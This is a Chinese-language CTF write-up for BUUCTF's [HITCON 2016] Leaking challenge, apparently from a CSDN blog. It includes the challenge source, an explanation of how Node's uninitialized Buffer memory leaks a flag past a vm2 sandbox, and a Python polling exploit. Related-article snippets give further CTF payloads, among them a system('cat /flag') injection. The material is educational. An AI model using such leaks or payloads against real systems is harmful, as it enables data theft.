BUUCTF [HITCON 2016] Leaking

最新推荐文章于 2022-01-01 14:13:14 发布
最新推荐文章于 2022-01-01 14:13:14 发布
阅读量806 收藏 4
点赞数 2
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF HITCON 2016 Leaking writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/112387663
版权

BUUCTF [HITCON 2016] Leaking

考点:

  1. node.jsVM2沙箱逃逸
  2. JS通过Buffer 类处理二进制数据的缓冲区

启动环境:

"use strict";

var randomstring = require("randomstring");
var express = require("express");
var {
    VM
} = require("vm2");
var fs = require("fs");

var app = express();
var flag = require("./config.js").flag

app.get("/", function(req, res) {
    res.header("Content-Type", "text/plain");

    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
    eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
    if (req.query.data && req.query.data.length <= 12) {
        var vm = new VM({
            timeout: 1000
        });
        console.log(req.query.data);
        res.send("eval ->" + vm.run(req.query.data));
    } else {
        res.send(fs.readFileSync(__filename).toString());
    }
});

app.listen(3000, function() {
    console.log("listening on port 3000!");
});

题目名:泄露,给出了源码,应该是段Node.js代码,没太接触过
其中定义了变量flag,并且存在eval()函数,可能是需要命令执行,并且注释也提示了flag被藏在这里。查看到前面有var { VM } = require("vm2");,查阅资料后,得知是Node.js 官方安全沙箱的库,参考资料NPM酷库:vm2,安全的沙箱环境

  1. VM2原理
    VM2基于VM,使用官方的VM库构建沙箱环境。然后使用JavaScriptProxy技术来防止沙箱脚本逃逸。

  2. vm2 特性

  • 运行不受信任的JS脚本
  • 沙箱的终端输出信息完全可控
  • 沙箱内可以受限地加载modules
  • 可以安全地向沙箱间传递callback
  • 死循环攻击免疫 while (true) {}

node.js沙箱逃逸是个知识盲区,查阅了大佬的wp[HITCON 2016]Leaking node.js沙箱逃逸

在较早一点的node.js版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。

注:关于 Buffer
JavaScript 语言自身只有字符串数据类型,没有二进制数据类型。
但在处理像TCP流文件流时,必须使用到二进制数据。因此在 Node.js中,定义了一个 Buffer 类,该类用来创建一个专门存放二进制数据的缓存区。

只要是调用过的变量,一定会存在内存中,所以需要使用Buffer()来读取内存,使用data=Buffer(800)分配一个800的单位为8位字节的buffer,编写Python3的EXP:

import requests

url = 'http://f81a9cf8-9be7-4245-96fe-da986bbe60e1.node3.buuoj.cn/?data=Buffer(800)'

while True:
    res = requests.get(url)
    print(res.status_code)

    if 'hitcon{' in res.text:
        print(res.text)
        break

运行一阵子后,得到flag:
在这里插入图片描述

Senimo_
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
houseoforange_hitcon_2016
fayinq的博客
04-07 263
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
HITCON 2016——PHP反序列化漏洞
qq_41560595的博客
09-18 378
PHP反序列化漏洞典型例题
BUUCTF--[HITCON 2016]Leaking
qq_46263951的博客
08-13 268
进入页面后给出代码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res).
[HITCON 2016]Leaking
fmyyy1的博客
05-25 330
"use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res) { res.he
[HITCON 2016]Leaking 记录
SopRomeo的博客
10-16 853
node.js 代码审计 ⑧太懂node.js 他是用VM2来执行的 可知buffer emmm,搜着搜着wp搜出来了 相关wp 低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中,那么我们可以构造paylaod读取内存 相关资料 这我也看不懂。。。。。emmmm 记得用数组来绕这个长度限制 payload(这个payload在buu无效) ?data[]=for (var step = 0; step < 100000; step++) {var buf =.
[HITCON 2016]Leaking-nodejsVM沙箱逃逸
cjdgg的博客
08-19 675
[HITCON 2016]Leaking 最近想学下nodejs相关的题目,所以去buu上又找了一道来做 进入题目后如上图所示,直接给出了源代码,老样子,拿出之前收藏的nodejs相关安全问题来对比着看看,我发现这里用了VM沙箱,那最有可能考的就是VM逃逸了 emem由于之前没做过,说实话,光看这个完全不知道该怎么做,还是老实找个大佬的WP来看看吧 那我们先来分析下代码,下面这段代码是整道题的核心 /* Orange is so kind so he put the flag here. But
[HITCON 2016]Leaking沙箱逃逸学习
Y4tacker的博客
02-23 817
[HITCON 2016]Leaking沙箱逃逸学习 node.js 里提供了 vm 模块,相当于一个虚拟机,可以让你在执行代码时候隔离当前的执行环境,避免被恶意代码攻击。但是这道题比较有意思 考点是: node.js中VM2沙箱逃逸 JS通过Buffer 类处理二进制数据的缓冲区 首先给出了题目的源码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var {
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1568
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
BUUCTF-PWN刷题记录-24 & libc-2.29学习(下)
weixin_44145820的博客
05-29 1092
目录[2020 新春红包题]3 [2020 新春红包题]3
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
[WUSTCTF2020]dp_leaking_1s_very_d@angerous
weixin_44110537的博客
07-17 468
题目 分析 模板题,dp泄露,直接用之前写过的代码,改一下数据即可. import gmpy2 import rsa import binascii p=0 e=65537 n = 15680834359857877495737569681518898068216674060930283109969649206824633719879251089881849623916633901520730510210143163428316854449298458656679999647115025238214
攻防世界 web高手进阶区 5分题 leaking
闵行小鱼塘
04-14 648
攻防世界web高手进阶区的5分题,本篇是leakingwriteup
[HITCON 2016]Leaking node.js沙箱逃逸
a3320315的博客
02-08 1982
0x01 源码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("...
还原HITCON 2016一道web题(php反序列化漏洞)
洞若观火
07-27 3319
实验环境搭建:PHPstudy,火狐(backbar),notepad++; 原题目代码:https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2016/babytrick 本人在还原此题目时,因为mysql数据库用户名密码和方便调试等原因对源码的一些参数做了一些相应的改动,但是没有改变主要代码。 c...
由看雪.Wifi万能钥匙 CTF 2017 第4题分析linux double free及unlinking漏洞
小强的博客
09-01 1811
相关程序可以在这里下载:http://ctf.pediy.com/game-fight-34.htm 我是在ubuntu16 64位调试的 先说下知识点吧,简单的请参考我的上一篇文章:http://blog.csdn.net/qq_35519254/article/details/77532248 现在unlink函数加了个判断需要绕过: 即必须保证FD->bk = P
CTF | Web 安全学习 20/07/11
Sunny_Ducky的博客
07-11 419
题目来源:攻防世界 新手区 题目描述:查看源代码
xctf攻防世界 Web高手进阶区 leaking
l8947943的博客
01-01 1666
1. 进入环境,查看内容,给了一堆代码 看到基本的代码格式,还有其中var { VM } = require(“vm2”);,这是Node.js的代码。其中也给了一句注释: /* Orange is so kind so he put the flag here. But if you can guess correctly :P */ eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\"
CTFhub远程包含
qq_41497476的博客
07-27 1507
没有可直接利用的shell了,但是测试了一下,发现php伪协议中的input协议可以利用 试试用这种方式展示目录下的文件 从phpinfo内可以看到根目录为/var/www/html。 改post的命令为<?php system('find / -name flag*'); ?> 再改为 <?php system('cat /flag'); ?> 得到flag ...
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值